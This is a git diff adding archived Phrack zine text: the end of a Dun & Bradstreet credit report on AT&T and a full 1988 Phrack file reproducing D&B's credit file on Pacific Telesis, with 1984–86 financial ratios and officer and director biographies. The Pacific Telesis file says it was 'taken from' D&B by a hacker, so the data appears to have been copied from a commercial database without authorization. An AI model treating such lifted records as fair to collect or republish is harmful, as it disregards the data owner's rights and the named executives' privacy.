+      Quick Ratio . . . . . . . . .      0.9   (10.0)     2.9     1.2     0.6
+      Current Ratio . . . . . . . .      1.4    (6.7)     4.9     2.2     1.0
+      Curr Liab to Net Worth (%). .     77.6    (1.1)    13.2    26.4    38.1
+      Curr Liab to Inventory (%). .    318.8    32.1    244.8   475.8   675.0
+      Total Liab to Net Worth (%) .    168.9    (4.3)   127.4   180.2   297.2
+      Fix Assets to Net Worth (%) .    145.7    (3.6)   144.9   215.0   263.0
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .     83.7   (11.1)    31.9    46.7    61.6
+      Sales to Inventory. . . . . .      9.7    32.9     56.2    33.8    20.0
+      Assets to Sales (%) . . . . .    114.1    (1.6)   210.5   266.1   373.4
+      Sales to Net Working Cap. . .      7.8    21.9      6.3     2.3     1.1
+      Acct Pay to Sales (%) . . . .     13.6    (4.2)     4.9     8.7    13.8
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .      0.4   (91.1)    20.1    14.6    11.3
+      Return on Assets (%). . . . .      0.4   (89.5)     7.2     5.7     3.7
+      Return on Net Worth (%) . . .      1.0   (90.6)    19.0    15.9    12.8
+
+          Industry norms based on 469  firms,
+
+          with assets over $5 million.
+
+      12/31/85 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Cash. . . . . . . . . . . . .     2,213,700       3.4      5.5      7.5
+      Accounts Receivable . . . . .     8,996,100      (4.0)    22.2      5.6
+      Notes Receivable. . . . . . .          ----      ----     ----      0.4
+      Inventory . . . . . . . . . .     4,759,300      (0.6)    11.8      1.2
+      Other Current Assets. . . . .       948,500      (8.2)     2.3      5.1
+
+      Total Current Assets. . . . .    16,917,600      (2.4)    41.8     19.8
+
+      Fixed Assets. . . . . . . . .    22,112,900       5.2     54.7     39.2
+      Other Non-current Assets. . .     1,432,000      (3.2)     3.5     41.0
+
+      Total Assets. . . . . . . . .    40,462,500       1.6    100.0    100.0
+
+
+      Accounts Payable. . . . . . .     4,942,800     (11.4)    12.2      4.9
+      Bank Loans. . . . . . . . . .          ----      ----     ----      0.3
+      Notes Payable . . . . . . . .         2,100      ----     ----      0.8
+      Other Current Liabilities . .     6,542,600      15.5     16.2      5.9
+
+      Total Current Liabilities . .    11,487,500       2.2     28.4     11.9
+
+      Other Long Term Liab. . . . .     9,553,200       2.7     23.6     46.8
+      Deferred Credits. . . . . . .     4,788,500      18.9     11.8      6.8
+      Net Worth . . . . . . . . . .    14,633,300      (4.1)    36.2     34.5
+
+      Total Liabilities & Worth. .     40,462,500       1.6    100.0    100.0
+
+      Net Sales . . . . . . . . . .    34,909,500       5.2    100.0    100.0
+      Gross Profit. . . . . . . . .          ----      ----     ----     33.7
+      Net Profit After Tax. . . . .     1,556,800      13.6      4.5     14.0
+      Dividends/Withdrawals . . . .     1,382,900       3.7      4.0     13.0
+      Working Capital . . . . . . .     5,430,100     (10.8)    ----     ----
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+      Quick Ratio . . . . . . . . .      1.0    ----      2.5     1.1     0.6
+      Current Ratio . . . . . . . .      1.5    ----      3.8     1.9     0.9
+      Curr Liab to Net Worth (%). .     78.5     6.5     15.8    29.4    43.9
+      Curr Liab to Inventory (%). .    241.4     2.8    285.7   485.5   790.6
+      Total Liab to Net Worth (%) .    176.5     9.6    134.4   190.1   320.9
+      Fix Assets to Net Worth (%) .    151.1     9.7    148.4   219.0   289.5
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .     94.1    (8.7)    31.5    47.2    63.8
+      Sales to Inventory. . . . . .      7.3     5.8     52.3    31.4    18.0
+      Assets to Sales (%) . . . . .    115.9    (3.4)   217.1   277.8   356.8
+      Sales to Net Working Cap. . .      6.4    16.4      6.0     2.7     1.6
+      Acct Pay to Sales (%) . . . .     14.2   (15.5)     6.1    10.4    15.7
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .      4.5     9.8     19.0    13.6     9.5
+      Return on Assets (%). . . . .      3.8    11.8      6.9     5.3     3.4
+      Return on Net Worth (%) . . .     10.6    17.8     19.7    15.8    12.7
+
+
+          Industry norms based on 605  firms,
+          with assets over $5 million.
+
+      12/31/84 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                     COMPANY    INDST
+                                           COMPANY      %      NORM %
+      Cash. . . . . . . . . . . . .     2,139,900       5.4      6.6
+      Accounts Receivable . . . . .     9,370,800      23.5      6.3
+      Notes Receivable. . . . . . .          ----      ----      0.4
+      Inventory . . . . . . . . . .     4,789,200      12.0      1.2
+      Other Current Assets. . . . .     1,033,100       2.6      4.1
+
+      Total Current Assets. . . . .    17,333,000      43.5     18.6
+
+      Fixed Assets. . . . . . . . .    21,015,000      52.8     45.0
+      Other Non-current Assets. . .     1,478,600       3.7     36.4
+
+
+      Total Assets. . . . . . . . .    39,826,600     100.0    100.0
+
+      Accounts Payable. . . . . . .     5,580,300      14.0      5.2
+      Bank Loans. . . . . . . . . .          ----      ----      0.2
+      Notes Payable . . . . . . . .          ----      ----      1.0
+      Other Current Liabilities . .     5,663,300      14.2      5.5
+
+      Total Current Liabilities . .    11,243,600      28.2     11.9
+
+      Other Long Term Liab. . . . .     9,300,200      23.4     47.8
+      Deferred Credits. . . . . . .     4,026,000      10.1      6.5
+      Net Worth . . . . . . . . . .    15,256,800      38.3     33.8
+
+      Total Liabilities & Worth. .     39,826,600     100.0    100.0
+
+      Net Sales . . . . . . . . . .    33,187,500     100.0    100.0
+      Gross Profit. . . . . . . . .    16,436,200      49.5     28.1
+      Net Profit After Tax. . . . .     1,369,900       4.1     14.1
+      Dividends/Withdrawals . . . .     1,333,800       4.0      7.3
+      Working Capital . . . . . . .     6,089,400      ----     ----
+
+
+      RATIOS                                 ---INDUSTRY QUARTILES---
+                                      COMPANY  UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+      Quick Ratio . . . . . . . . .      1.0     2.3     1.0     0.6
+      Current Ratio . . . . . . . .      1.5     3.4     1.6     0.9
+      Curr Liab to Net Worth (%). .     73.7    17.7    30.6    43.5
+      Curr Liab to Inventory (%). .    234.8   312.5   491.6   754.3
+      Total Liab to Net Worth (%) .    161.0   139.2   193.7   314.9
+      Fix Assets to Net Worth (%) .    137.7   161.5   228.9   295.3
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .    103.1    34.3    51.6    67.8
+      Sales to Inventory. . . . . .      6.9    52.1    32.6    20.1
+      Assets to Sales (%) . . . . .    120.0   216.7   268.2   353.0
+      Sales to Net Working Cap. . .      5.5     7.2     3.1     1.7
+      Acct Pay to Sales (%) . . . .     16.8     6.2    10.9    15.4
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .      4.1    18.5    13.1     9.8
+
+      Return on Assets (%). . . . .      3.4     7.0     5.3     3.3
+      Return on Net Worth (%) . . .      9.0    19.7    15.7    12.6
+
+          Industry norms based on 504  firms,
+          with assets over $5 million.
+
+
+             END OF DOCUMENT
+
+
+
+
+Name & Address:
+      AMERICAN TELEPHONE AND                    Trade-Style Name:
+      550 Madison Ave                           At & T
+      NEW YORK, NY 10022
+
+      Telephone: 212-605-5300
+
+      DUNS Number: 00-698-0080
+
+      Line of Business: TELECOMMUNICATIONS SVCS TELE
+
+      Primary SIC Code: 4811
+      Secondary SIC Codes: 4821 3661 3357 3573 5999
+
+      Year Started:  1885                 (12/31/86)  COMBINATION FISCAL
+      Employees Total:     317,000        Sales:           34,087,000,000
+      Employees Here:        1,800        Net Worth:       14,462,000,000
+
+      This is a PUBLIC company
+
+
+
+      HISTORY
+      04/20/87
+
+      JAMES E. OLSON, CHB-CEO+           ROBERT E. ALLEN, PRES-COO+
+      RANDALL L TOBIAS, V CHM+           CHARLES MARSHALL, V CHM+
+      MORRIS TANENBAUM, V CHM+           S. LAWRENCE PRENDERGAST, V PRES-
+                                         TREAS
+      C. PERRY COLWELL, V PRES-
+      CONTROLLER
+      DIRECTOR(S): The officers identified by (+) and Howard H. Baker Jr,
+      James H. Evans, Peter F. Haas, Philip M. Hawley, Edward G. Jefferson,
+      Belton K. Johnson, Juanita M. Kreps, Donald S. Perkins, Henry B.
+      Schacht, Michael I. Sovern, Donald F. McHenry, Rawleigh Warner Jr,
+      Joseph D. Williams and Thomas H. Wyman.
+           Incorporated New York Mar 3 1885.
+           Authorized capital consists of 1,200,000,000 shares common stock $1
+      par value and 100,000,000 shares preferred stock $1 par value.
+           Outstanding Capital Stock at Feb 28 1987: 1,071,904,000 common
+      shares and at Dec 31 1986 preferred stock outstanding consisted of
+      redeemable preferred shares composed of 8,500,000 shares of $3.64
+      preferred stated value $50; 8,800,000 shares of $3.74 preferred, stated
+      value $50 and 25,500 shares of $77.50 preferred, stated value $1,000.
+           Business started 1885.
+           The  company's common stock is listed on the New York, Boston,
+      Midwest, Philadelphia and Pacific Coast Stock Exchanges under the symbol
+      "ATT". At Dec 31 1986 there were 2,782,102 common shareholders. At Jan 1
+      1986 officers and directors as a group owned less than 1% of the
+      outstanding common stock with the remainder owned by the public.
+           OLSON, born 1925. 1950 Univ of North Dakota, BSC. Also attended
+      Univ of Pennsylvania. 1943-1946 United States Army Air Force. 1960-1970
+      Northwestern Bell Telephone Co, V Pres-Gen Mgr. 1970-1974 Indiana Bell
+      Telephone Co, Pres. 1974-1977 Illinois Bell Telephone Co, Pres. 1977 to
+      date AT&T, 1979 V Chb-Dir; Jun 1985 President, 1986 CHM.
+           MARSHALL, born 1929, married. 1951 Univ of Illinois, BS; also
+      attended Bradley Univ; 1953-present AT&T; 1980 Asst Treas, 1976 Vice
+      Pres-Treas; 1985 Exec Vice President, 1986 V-CHM.
+           TANENBAUM, born 1928 married. 1949 Johns Hopkins Univ, BA
+      chemistry. 1950 Princeton Univ, MA chemistry. 1952 PhD in physical
+      chemistry. 1952 to date AT&T, various positions, 1985 Ex Vice Pres, 1986
+      V-CHM.
+           PRENDERGAST, born 1941 married. 1963 Brown Univ, BA. 1969 New York
+      Univ, MBA. 1963-1973 Western Electric Company; 1973 to date AT&T, 1980
+      Asst Treas, 1984 V Pres-Treas.
+           COLWELL, born 1927. Attended AT&T Institute of Technology.
+      1945-1947 U S Army. Employed by AT&T and its subsidiaries since 1948 in
+      various positions. 1984 Vice Pres & Contr, AT&T Technologies Inc
+      (subsidiary); 1985-present V Pres-Contr.
+           ALLEN  born 1935 married. 1957 Wabash College BA. Has held a
+      vareity of executive position with former Bell Operating subsidiaries
+      and AT&T subsidiaries. Appointed to current position in 1986.
+           TOBIAS born 1943. 1964 Indiana University with a BS in Marketing.
+      Has held a variety of management and executive positions with former
+      Bell Operating subsidiaries and AT&T subsidiaries. Elected to current
+      position in 1986.
+           OTHER  OFFICERS: James R. Billingsley, Sr V Pres Federal
+      Regulation; Michael Brunner, Ex V Pres Federal Systems; Harold
+      Burlingame, Sr V Pres Public Relations and Employee Information;
+      Vittorio Cassoni, Sr V Pres Data Systems Division; Richard Holbrook, Sr
+      V Pres Business Sales; Robert Kavner, Sr V Pres & CFO; Gerald Lowrie, Sr
+      V Pres Public Affairs; John Nemecek, Ex V Pres Components & Electronic
+      Systems; John O'Neill, Ex V Pres National Systems Products; Alfred
+      Partoll, Sr V Pres External Affairs; John Segall, Sr V Pres Corporate
+      Strategy & Development; Alexander Stack, Sr V Pres Communications
+      Systems; Paul Villiere, Ex V Pres Network Systems Marketing and Customer
+      Operations; John Zegler, Sr V Pres and General Counsel; and Lydell
+      Christensen, Corp V Pres and Secretary.
+           DIRECTORS: MCHENRY, research professor, Georgetown University.
+      BAKER JR, partner, Vinson & Elkins and Baker, Worthington, Crossley,
+      Stansberry & Woolf, attorneys. EVANS, former Chairman, Union Pacific
+      Corporation. HAAS, Chairman, Levi Strauss & Company. HAWLEY, Chairman,
+      Carter Hawley Hale Stores Inc. JEFFERSON, former Chairman, E.I. du Pont
+      de Nemours and Company. JOHNSON, private investor and owner of The
+      Chaparrosa Ranch. KREPS, former United States Secretary of Commerce.
+      PERKINS, former Chairman, Jewel Companies Inc. SCHACHT, Chairman,
+      Cummins Engine Company Inc. SOVERN, President, Columbia University.
+      WARNER JR, former Chairman, Mobil Corporation. WILLIAMS, Chairman,
+      Warner Lambert Company. WYMAN, former Chairman, CBS Inc.
+           As  a  result of an antitrust action entered against American
+      Telephone and Telegraph Company (AT&T) by the Department of Justice,
+      AT&T agreed in Jan 1982 to break up its holdings. In Aug 1982, the U. S.
+      District Court-District of Columbia, entered a consent decree requiring
+      AT&T to divest itself of portions of its operations.
+           The  operations affected consisted of exchange telecommunications,
+      exchange access functions, printed directory services and cellular radio
+      telecommunications services. AT&T retained ownership of AT&T
+      Communications Inc, AT&T Technologies Inc, Bell Telephone Laboratories
+      Incorporated, AT&T Information Systems Inc, AT&T International Inc and
+      those portions of the 22 Bell System Telephone Company subsidiaries
+      which manufactured new customer premises equipment. The consent decree,
+      with modifications, was agreed to by AT&T and the U. S. Department of
+      Justice and approved by the U. S. Supreme Court in Feb 1983. In Dec
+      1982, AT&T filed a plan of reorganization, outlining the means of
+      compliance with the divestiture order. The plan was approved by the
+      court in Aug 1983
+           The divestiture completed on Jan 1 1984, was accomplished by the
+      reorganization of the 22 principal AT&T Bell System Telephone Company
+      subsidiaries under 7 new regional holding companies. Each AT&T common
+      shareowner of record as of Dec 10 1983 received 1 share of common stock
+      in each of the newly formed corporations for every 10 common shares of
+      AT&T. AT&T common shareowners retained their AT&T stock ownership.
+           The   company has an ownership interest in certain ventures to
+      include:
+           (1) Owns 22% of the voting stock of Ing C. Olivetti & C., S.p.A. of
+      Milan, Italy with which the company develops and markets office
+      automation products in Europe.
+           (2) Owns 50% of a joint venture with the N. V. Philips Company of
+      the Netherlands organized to manufacture and market switching and
+      transmission systems in Europe and elsewhere.
+           (3) Owns 44% of a joint venture with the Goldstar Group of the
+      Republic of Korea which manufactures switching products and distributes
+      the company's 3B Family of Computers in Korea.
+           The company also maintain stock interests in other concerns.
+           In addition to joint venture activities described above,
+      intercompany relations have also included occasional advances from
+      subject.
+
+      OPERATION
+      04/20/87
+
+
+           Through subsidiaries, provides intrastate, interstate and
+      international long distance telecommunications and information transport
+      services, a broad range of voice and data services including, Domestic
+      and Long Distance Service, Wide Area Telecommunications Services (WATS),
+      800 Service, 900 Dial It Services and a series of low, medium and high
+      speed digital voice and data services known as Accunet Digital Services.
+      Also manufactures telephone communications equipment and apparatus,
+      communications wire and cable, computers for use in communications
+      systems, as well as for general purposes, retails and leases telephone
+      communications equipment and provides research and development in
+      information and telecommunications technology. The company is subject to
+      the jurisdiction of the Federal Communications Commission with respect
+      to interstate and international rates, lines, services and other
+      matters. Terms: Net 30, cash and contract providing for progress
+      payments with final payment upon completion. The company's AT&T
+      Communications Inc subsidiary provides interstate and intrastate long
+      distance communications services for 80 million residential customers
+      and 7 million businesses. Sells to a wide variety of businesses,
+      government agencies, individuals and others. Nonseasonal.
+           EMPLOYEES: 317,000 including officers. 1,800 employed here.
+           FACILITIES: Owns premises in multi story steel building in good
+      condition. Premises neat.
+           LOCATION: Central business section on main street.
+           BRANCHES: The company's subsidiaries operate 19 major manufacturing
+      plants located throughout the United States containing a total 26.2
+      million square feet of space of which 1.49 million square feet were in
+      leased premises. There are 7 regional centers and 24 distribution
+      centers. In addition, there are numerous domestic and foreign branch
+      offices.
+           SUBSIDIARIES: The company had numerous subsidiaries as of Dec 31
+      1986. Subsidiaries perform the various services and other functions
+      described above. Its unconsolidated finance subsidiary, AT&T Credit
+      Corporation, provides financing to customers through leasing and
+      installment sales programs and purchases from AT&T's subsidiaries the
+      rights to receivables under long-term service agreements. Intercompany
+      relations consists of parent making occasional advances to subsidiaries
+      and service transactions settled on a convenience basis. A list of
+      principal subsidiaries as of Dec 31 1986 is on file at the Millburn, NJ
+      office of Dun & Bradstreet.
+      08-27(9Z0   /61)         00703                    001   678  NH
+
+      Chemical Bank, 277 Park Ave; Marine Midland Bank, 140 Broadway; Chase
+      Manhattan Bank, 1 Chase Manhattan Plaza
+
+      12/31/86 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Total Current Assets. . . . .    15,572,000      (8.0)    40.0     22.0
+      Fixed Assets. . . . . . . . .    21,078,000      (4.7)    54.2     35.6
+      Other Non-current Assets. . .     2,233,000      55.9      5.7     42.4
+      Total Assets. . . . . . . . .    38,883,000      (3.9)   100.0    100.0
+      Total Current Liabilities . .    11,217,000      (2.4)    28.8     11.6
+      Other Long Term Liab. . . . .    13,204,000      38.2     34.0     46.8
+      Net Worth . . . . . . . . . .    14,462,000      (1.2)    37.2     35.2
+      Total Liabilities & Worth. .     38,883,000      (3.9)   100.0    100.0
+      Net Sales . . . . . . . . . .    34,087,000      (2.4)   100.0    100.0
+      Gross Profit. . . . . . . . .    15,838,000      ----     46.5     40.1
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+      Quick Ratio . . . . . . . . .      0.9   (10.0)     2.9     1.2     0.6
+      Current Ratio . . . . . . . .      1.4    (6.7)     4.9     2.2     1.0
+      Total Liab to Net Worth (%) .    168.9    (4.3)   127.4   180.2   297.2
+      Sales to Inventory. . . . . .      9.7    32.9     56.2    33.8    20.0
+      Return on Sales (%) . . . . .      0.4   (91.1)    20.1    14.6    11.3
+      Return on Assets (%). . . . .      0.4   (89.5)     7.2     5.7     3.7
+      Return on Net Worth (%) . . .      1.0   (90.6)    19.0    15.9    12.8
+
+          Industry norms based on 469  firms,
+          with assets over $5 million.
+
+
+End_of_File.
diff --git a/phrack17/3.txt b/phrack17/3.txt
new file mode 100644
index 0000000..7a9860a
--- /dev/null
+++ b/phrack17/3.txt
@@ -0,0 +1,493 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+          File 3 of 12 : Dun & Bradstreet Report on Pacific Telesis
+
+
+
+ Pacific Telesis Credit File, taken from Dun & Bradstreet by Elric of Imrryr
+
+
+
+Name & Address:
+      PACIFIC TELESIS GROUP (INC)
+      140 New Montgomery St
+      SAN FRANCISCO, CA 94105
+
+      Telephone: 415-882-8000
+
+      DUNS Number: 10-346-0846
+
+      Line of Business: TELECOMMUNICATION SERVICES
+
+      Primary SIC Code: 4811
+      Secondary SIC Codes: 2741 5063 5732 6159
+
+      Year Started:  1906                 (12/31/86)  COMBINATION FISCAL
+      Employees Total:      74,937        Sales:            8,977,300,000
+      Employees Here:        2,000        Net Worth:        7,753,300,000
+
+      This is a PUBLIC company
+
+
+      12/31/86 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Cash. . . . . . . . . . . . .       200,600     671.5      1.0      9.0
+      Accounts Receivable . . . . .     1,390,700      (3.8)     6.8      5.7
+      Notes Receivable. . . . . . .          ----      ----     ----      0.2
+      Inventory . . . . . . . . . .       116,300      (4.4)     0.6      1.3
+      Other Current Assets. . . . .       448,700      18.6      2.2      5.8
+
+      Total Current Assets. . . . .     2,156,300       9.3     10.6     22.0
+
+      Fixed Assets. . . . . . . . .    17,244,900       1.6     84.9     35.6
+      Other Non-current Assets. . .       919,300      53.8      4.5     42.4
+
+      Total Assets. . . . . . . . .    20,320,500       4.0    100.0    100.0
+
+      Accounts Payable. . . . . . .     1,760,300      74.1      8.7      4.2
+      Bank Loans. . . . . . . . . .        21,800     847.8      0.1      0.2
+
+      Notes Payable . . . . . . . .          ----      ----     ----      1.0
+      Other Current Liabilities . .       623,000     (35.8)     3.1      6.2
+
+      Total Current Liabilities . .     2,405,100      21.3     11.8     11.6
+
+      Other Long Term Liab. . . . .     5,564,600      (7.6)    27.4     46.8
+      Deferred Credits. . . . . . .     4,597,500       9.0     22.6      6.4
+      Net Worth . . . . . . . . . .     7,753,300       6.0     38.2     35.2
+
+      Total Liabilities & Worth. .     20,320,500       4.0    100.0    100.0
+
+      Net Sales . . . . . . . . . .     8,977,300       5.6    100.0    100.0
+      Gross Profit. . . . . . . . .          ----      ----     ----     40.1
+      Net Profit After Tax. . . . .     1,079,400      16.2     12.0     15.3
+      Dividends/Withdrawals . . . .       654,100      10.0      7.3      7.7
+      Working Capital . . . . . . .       248,800    (999.9)    ----     ----
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+
+      Quick Ratio . . . . . . . . .      0.7    ----      2.9     1.2     0.6
+      Current Ratio . . . . . . . .      0.9   (10.0)     4.9     2.2     1.0
+      Curr Liab to Net Worth (%). .     31.0    14.4     13.2    26.4    38.1
+      Curr Liab to Inventory (%). .    999.9    26.9    244.8   475.8   675.0
+      Total Liab to Net Worth (%) .    162.1    (2.9)   127.4   180.2   297.2
+      Fix Assets to Net Worth (%) .    222.4    (4.1)   144.9   215.0   263.0
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .     56.5    (9.0)    31.9    46.7    61.6
+      Sales to Inventory. . . . . .     77.2    10.6     56.2    33.8    20.0
+      Assets to Sales (%) . . . . .    226.4    (1.5)   210.5   266.1   373.4
+      Sales to Net Working Cap. . .     ----    ----      6.3     2.3     1.1
+      Acct Pay to Sales (%) . . . .     19.6    64.7      4.9     8.7    13.8
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .     12.0    10.1     20.1    14.6    11.3
+      Return on Assets (%). . . . .      5.3    10.4      7.2     5.7     3.7
+      Return on Net Worth (%) . . .     13.9     9.4     19.0    15.9    12.8
+
+          Industry norms based on 469  firms,
+
+          with assets over $5 million.
+
+      12/31/85 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Cash. . . . . . . . . . . . .        26,000     550.0      0.1      7.5
+      Accounts Receivable . . . . .     1,446,200      20.6      7.4      5.6
+      Notes Receivable. . . . . . .          ----      ----     ----      0.4
+      Inventory . . . . . . . . . .       121,700      ----      0.6      1.2
+      Other Current Assets. . . . .       378,300      (8.3)     1.9      5.1
+
+      Total Current Assets. . . . .     1,972,200      22.1     10.1     19.8
+
+      Fixed Assets. . . . . . . . .    16,968,400       6.1     86.8     39.2
+      Other Non-current Assets. . .       597,700      29.4      3.1     41.0
+
+      Total Assets. . . . . . . . .    19,538,300       8.1    100.0    100.0
+
+
+      Accounts Payable. . . . . . .     1,011,100      14.6      5.2      4.9
+      Bank Loans. . . . . . . . . .         2,300      ----     ----      0.3
+      Notes Payable . . . . . . . .          ----      ----     ----      0.8
+      Other Current Liabilities . .       969,900      18.6      5.0      5.9
+
+      Total Current Liabilities . .     1,983,300      (1.0)    10.2     11.9
+
+      Other Long Term Liab. . . . .     6,021,700       0.8     30.8     46.8
+      Deferred Credits. . . . . . .     4,216,300      16.6     21.6      6.8
+      Net Worth . . . . . . . . . .     7,317,000      12.9     37.4     34.5
+
+      Total Liabilities & Worth. .     19,538,300       8.1    100.0    100.0
+
+      Net Sales . . . . . . . . . .     8,498,600       8.6    100.0    100.0
+      Gross Profit. . . . . . . . .          ----      ----     ----     33.7
+      Net Profit After Tax. . . . .       929,100      12.1     10.9     14.0
+      Dividends/Withdrawals . . . .       594,400      11.9      7.0     13.0
+      Working Capital . . . . . . .        11,100      ----     ----     ----
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+      Quick Ratio . . . . . . . . .      0.7    16.7      2.5     1.1     0.6
+      Current Ratio . . . . . . . .      1.0    25.0      3.8     1.9     0.9
+      Curr Liab to Net Worth (%). .     27.1   (12.3)    15.8    29.4    43.9
+      Curr Liab to Inventory (%). .    999.9    ----    285.7   485.5   790.6
+      Total Liab to Net Worth (%) .    167.0    (6.7)   134.4   190.1   320.9
+      Fix Assets to Net Worth (%) .    231.9    (6.0)   148.4   219.0   289.5
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .     62.1    11.1     31.5    47.2    63.8
+      Sales to Inventory. . . . . .     69.8    ----     52.3    31.4    18.0
+      Assets to Sales (%) . . . . .    229.9    (0.5)   217.1   277.8   356.8
+      Sales to Net Working Cap. . .     ----    ----      6.0     2.7     1.6
+      Acct Pay to Sales (%) . . . .     11.9     5.3      6.1    10.4    15.7
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .     10.9     2.8     19.0    13.6     9.5
+      Return on Assets (%). . . . .      4.8     4.3      6.9     5.3     3.4
+      Return on Net Worth (%) . . .     12.7    (0.8)    19.7    15.8    12.7
+
+
+          Industry norms based on 605  firms,
+          with assets over $5 million.
+
+      12/31/84 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                     COMPANY    INDST
+                                           COMPANY      %      NORM %
+      Cash. . . . . . . . . . . . .         4,000      ----      6.6
+      Accounts Receivable . . . . .     1,198,800       6.6      6.3
+      Notes Receivable. . . . . . .          ----      ----      0.4
+      Inventory . . . . . . . . . .          ----      ----      1.2
+      Other Current Assets. . . . .       412,400       2.3      4.1
+
+      Total Current Assets. . . . .     1,615,200       8.9     18.6
+
+      Fixed Assets. . . . . . . . .    15,999,500      88.5     45.0
+      Other Non-current Assets. . .       461,800       2.6     36.4
+
+
+      Total Assets. . . . . . . . .    18,076,500     100.0    100.0
+
+      Accounts Payable. . . . . . .       882,100       4.9      5.2
+      Bank Loans. . . . . . . . . .          ----      ----      0.2
+      Notes Payable . . . . . . . .       304,000       1.7      1.0
+      Other Current Liabilities . .       817,600       4.5      5.5
+
+      Total Current Liabilities . .     2,003,700      11.1     11.9
+
+      Other Long Term Liab. . . . .     5,973,500      33.0     47.8
+      Deferred Credits. . . . . . .     3,617,000      20.0      6.5
+      Net Worth . . . . . . . . . .     6,482,300      35.9     33.8
+
+      Total Liabilities & Worth. .     18,076,500     100.0    100.0
+
+      Net Sales . . . . . . . . . .     7,824,300     100.0    100.0
+      Gross Profit. . . . . . . . .          ----      ----     28.1
+      Net Profit After Tax. . . . .       828,500      10.6     14.1
+      Dividends/Withdrawals . . . .       531,200       6.8      7.3
+      Working Capital . . . . . . .       388,500      ----     ----
+
+
+      RATIOS                                 ---INDUSTRY QUARTILES---
+                                      COMPANY  UPPER  MEDIAN   LOWER
+          (SOLVENCY)
+      Quick Ratio . . . . . . . . .      0.6     2.3     1.0     0.6
+      Current Ratio . . . . . . . .      0.8     3.4     1.6     0.9
+      Curr Liab to Net Worth (%). .     30.9    17.7    30.6    43.5
+      Curr Liab to Inventory (%). .     ----   312.5   491.6   754.3
+      Total Liab to Net Worth (%) .    178.9   139.2   193.7   314.9
+      Fix Assets to Net Worth (%) .    246.8   161.5   228.9   295.3
+
+          (EFFICIENCY)
+      Coll Period (days). . . . . .     55.9    34.3    51.6    67.8
+      Sales to Inventory. . . . . .     ----    52.1    32.6    20.1
+      Assets to Sales (%) . . . . .    231.0   216.7   268.2   353.0
+      Sales to Net Working Cap. . .     ----     7.2     3.1     1.7
+      Acct Pay to Sales (%) . . . .     11.3     6.2    10.9    15.4
+
+          (PROFITABILITY)
+      Return on Sales (%) . . . . .     10.6    18.5    13.1     9.8
+      Return on Assets (%). . . . .      4.6     7.0     5.3     3.3
+
+      Return on Net Worth (%) . . .     12.8    19.7    15.7    12.6
+
+          Industry norms based on 504  firms,
+          with assets over $5 million.
+
+
+             END OF DOCUMENT
+
+
+
+
+Name & Address:
+      PACIFIC TELESIS GROUP (INC)
+      140 New Montgomery St
+      SAN FRANCISCO, CA 94105
+
+      Telephone: 415-882-8000
+
+      DUNS Number: 10-346-0846
+
+      Line of Business: TELECOMMUNICATION SERVICES
+
+      Primary SIC Code: 4811
+      Secondary SIC Codes: 2741 5063 5732 6159
+
+      Year Started:  1906                 (12/31/86)  COMBINATION FISCAL
+      Employees Total:      74,937        Sales:            8,977,300,000
+      Employees Here:        2,000        Net Worth:        7,753,300,000
+
+      This is a PUBLIC company
+
+
+
+      HISTORY
+      09/01/87
+
+      DONALD E GUINN, CHB PRES+          THEODORE J SAENGER, V CHB GROUP
+                                         PRES+
+      SAM L GINN, V CHB+                 JOHN E HULSE, V CHB CFO+
+      ROBERT V R DALENBERG, EX V PRES    BENTON W DIAL, EX V PRES-HUM
+      GEN COUNSEL SEC                    RESOURCES
+      ARTHUR C LATNO JR, EX V PRES       THOMAS G CROSS, V PRES TREAS
+      FRANK V SPILLER, V PRES
+      COMPTROLLER
+      DIRECTOR(S): The officers identified by (+) and Norman Barker Jr,
+      William P Clark, Willaim K Coblentz, Myron Du Bain, Herman E Gallegos
+      James R Harvey, Ivan J Houston, Leslie L Luttgens, E L Mc Neely, S
+      Donley Ritchey, Willaim French Smith & Mary S Metz.
+           Incorporated Nevada Oct 26 1983. Authorized capital consists of
+      505,000,000 shares common stock, $.10 par value.
+           OUTSTANDING CAPITAL STOCK: Consists of following at Dec 31 1986:
+      215,274,878 common shares at a stated value of $21.5 million plus
+      additional paid in capital of $5,068.5 million.
+           The stock is publicly traded on the New York, Pacific and Midwest
+      Stock Exchanges. There were 1,170,161 common shareholders at Feb 1 1987.
+      Officers and directors as a group hold less than 1% of stock. No other
+      entity owned more than 5% of the common stock outstanding.
+           The  authorized capital stock was increased to $1,100,000,000
+      shares in 1987 by Charter Amendment. In addition, the company declared a
+      two-for-one stock split in the form of a 100% stock dividend effective
+      Mar 25 1987.
